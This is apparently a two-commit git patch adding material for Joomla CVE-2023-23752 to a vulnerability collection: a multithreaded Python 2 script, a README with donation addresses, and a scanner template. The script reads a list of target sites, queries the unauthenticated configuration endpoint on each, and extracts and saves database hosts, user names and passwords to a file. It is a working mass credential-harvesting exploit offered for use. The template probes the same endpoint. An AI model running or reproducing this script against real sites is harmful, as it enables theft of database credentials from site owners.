From 84317197629ad5e16272b1cf0a45bec071a5b81a Mon Sep 17 00:00:00 2001
From: maoran <maoran_44@buaa.edu.cn>
Date: Wed, 15 Mar 2023 15:48:42 +0800
Subject: [PATCH 1/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23752?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../2023/CVE-2023-23752/CVE-2023-25136.py     | 41 +++++++++++++++++++
 cve/openssl/2023/CVE-2023-23752/README.md     | 14 +++++++
 cve/openssl/2023/yaml/CVE-2023-23752.yaml     | 40 ++++++++++++++++++
 openkylin_list.yaml                           |  1 +
 4 files changed, 96 insertions(+)
 create mode 100644 cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
 create mode 100644 cve/openssl/2023/CVE-2023-23752/README.md
 create mode 100644 cve/openssl/2023/yaml/CVE-2023-23752.yaml

diff --git a/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py b/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
new file mode 100644
index 00000000..59ef149d
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
@@ -0,0 +1,41 @@
+#An issue was discovered in Joomla! 4.0.0 through 
+#4.2.7. An improper access check allows 
+#unauthorized access to webservice endpoints.
+import requests,time,re,random,os,sys,json
+from multiprocessing.dummy import Pool as ThreadPool
+from colorama import Fore,Style, init
+init(autoreset=True)
+
+r = Fore.RED + Style.BRIGHT
+g = Fore.GREEN + Style.BRIGHT
+c = Fore.CYAN + Style.BRIGHT
+y = Fore.YELLOW + Style.BRIGHT
+o = Fore.RESET + Style.RESET_ALL
+
+
+def jomprv(url):
+	try:
+		headers = {'User-Agent': 'Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/101.0.4951.61 Mobile Safari/537.36'}
+		asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
+		if 'dbtype' in asw.content:
+			hoset = re.findall('"host":"(.*?)"',asw.content)[0]
+			debst = re.findall('"db":"(.*?)"',asw.content)[0]
+			uset = re.findall('"user":"(.*?)"',asw.content)[0]
+			paset = re.findall('"password":"(.*?)"',asw.content)[0]
+			print ("Domaij" + " : " + url)
+			print (g + "HOST" + " : " + hoset)
+			print (g + "DB" + " : " + debst)
+			print (g + "User" + " : " + uset)
+			print (g + "Pass" + " : " + paset)
+			open('res.txt', 'a').write('\n!== Results Joomla CVE-2023-23752 ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
+		else:
+			print(r+ 'BAD' + ' ' + url)
+			#for res in regex:
+	except:
+		pass
+print "{}JOOMLA! CVE-2023-23752  | Shin Code\n".format(y)
+url = open(raw_input(o+'List:~# '),'r').read().splitlines()
+pool = ThreadPool(int(30))
+pool.map(jomprv, url)
+pool.close()
+pool.join()
\ No newline at end of file
diff --git a/cve/openssl/2023/CVE-2023-23752/README.md b/cve/openssl/2023/CVE-2023-23752/README.md
new file mode 100644
index 00000000..f6c41690
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-23752/README.md
@@ -0,0 +1,14 @@
+# Joomla-CVE-2023-23752
+python 2.7
+
+Buy Coffee :
+
+Bitcoin $: 31mtLHqhaXXyCMnT2EU73U8fwYwigiEEU1
+
+Perfect Money $: U22270614
+
+Saweria $: https://saweria.co/Shin403
+
+Trakteer $: https://trakteer.id/shin403
+
+![Screenshot_2023-03-11-18-20-57-172-edit_com termux](https://user-images.githubusercontent.com/59664965/224481416-8fd859c7-ecb3-40e9-9730-2187b2ca388a.jpg)
diff --git a/cve/openssl/2023/yaml/CVE-2023-23752.yaml b/cve/openssl/2023/yaml/CVE-2023-23752.yaml
new file mode 100644
index 00000000..a8187499
--- /dev/null
+++ b/cve/openssl/2023/yaml/CVE-2023-23752.yaml
@@ -0,0 +1,40 @@
+id: CVE-2023-23752
+
+info:
+  name: CVE-2023-23752-joomla
+  author: hakimi
+  severity: high
+  description: description
+  reference:
+    - https://cve.report/CVE-2023-23752
+  tags: CVE-2023-23752
+
+requests:
+  - raw:
+      - |+
+        GET /api/index.php/v1/config/application?public=true HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9
+        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
+        Connection: close
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "links"
+          - '"password":'
+
+      - type: word
+        part: body
+        words:
+          - "attributes"
+
+      - type: status
+        status:
+          - 200
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 897401df..bb775b10 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -80,6 +80,7 @@ cve:
     - CVE-2023-25136
     - CVE-2021-3449
     - CVE-2022-0778
+    - CVE-2023-23752
   libxml2:
     - CVE-2020-24977
     - CVE-2021-3517
-- 
Gitee


From dd03178f85cae4f894ffca01905abd5957e5998e Mon Sep 17 00:00:00 2001
From: maoran <maoran_44@buaa.edu.cn>
Date: Wed, 15 Mar 2023 17:56:47 +0800
Subject: [PATCH 2/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23752?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../2023/CVE-2023-23752/CVE-2023-23752.py}                      | 0
 cve/{openssl => joomla}/2023/CVE-2023-23752/README.md           | 0
 cve/{openssl => joomla}/2023/yaml/CVE-2023-23752.yaml           | 0
 openkylin_list.yaml                                             | 2 ++
 4 files changed, 2 insertions(+)
 rename cve/{openssl/2023/CVE-2023-23752/CVE-2023-25136.py => joomla/2023/CVE-2023-23752/CVE-2023-23752.py} (100%)
 rename cve/{openssl => joomla}/2023/CVE-2023-23752/README.md (100%)
 rename cve/{openssl => joomla}/2023/yaml/CVE-2023-23752.yaml (100%)

diff --git a/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py b/cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py
similarity index 100%
rename from cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
rename to cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py
diff --git a/cve/openssl/2023/CVE-2023-23752/README.md b/cve/joomla/2023/CVE-2023-23752/README.md
similarity index 100%
rename from cve/openssl/2023/CVE-2023-23752/README.md
rename to cve/joomla/2023/CVE-2023-23752/README.md
diff --git a/cve/openssl/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml
similarity index 100%
rename from cve/openssl/2023/yaml/CVE-2023-23752.yaml
rename to cve/joomla/2023/yaml/CVE-2023-23752.yaml
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index bb775b10..35e701bc 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -79,7 +79,9 @@ cve:
     - CVE-2022-3602
     - CVE-2023-25136
     - CVE-2021-3449
+  joomla:
     - CVE-2022-0778
+  
     - CVE-2023-23752
   libxml2:
     - CVE-2020-24977
-- 
Gitee